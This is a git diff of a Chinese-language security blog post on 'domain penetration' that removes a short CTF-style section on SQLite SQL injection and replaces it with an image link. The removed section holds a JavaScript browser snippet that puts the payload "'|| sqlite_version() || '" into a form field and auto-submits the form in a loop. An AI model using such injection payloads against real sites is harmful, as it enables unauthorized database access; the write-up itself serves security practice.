--- a/_posts/2022-07-25-域渗透.md
+++ b/_posts/2022-07-25-域渗透.md
@@ -10,26 +10,4 @@ tags:
     - 攻防
 ---
 
-# Raw Water
-
-sqlite sql注入
-
-它的表单要填的有点多
-
-上jio本
-
-```js
-const wait = (ms) => new Promise((resolve) => setTimeout(resolve, ms));
-document.querySelector('input').value = "'|| sqlite_version() || '";
-for (;;) {
-  [...document.querySelectorAll("input")].forEach(
-    (i) => (i.value ||= "1")
-  );
-  document.querySelector("main > form > button").click();
-  await wait(500);
-  if (new URL(location.href).pathname.startsWith("/orders/")) {
-    break;
-  }
-}
-```
-
+![image-20240731203003540](\img\image-20240731203003540.png)
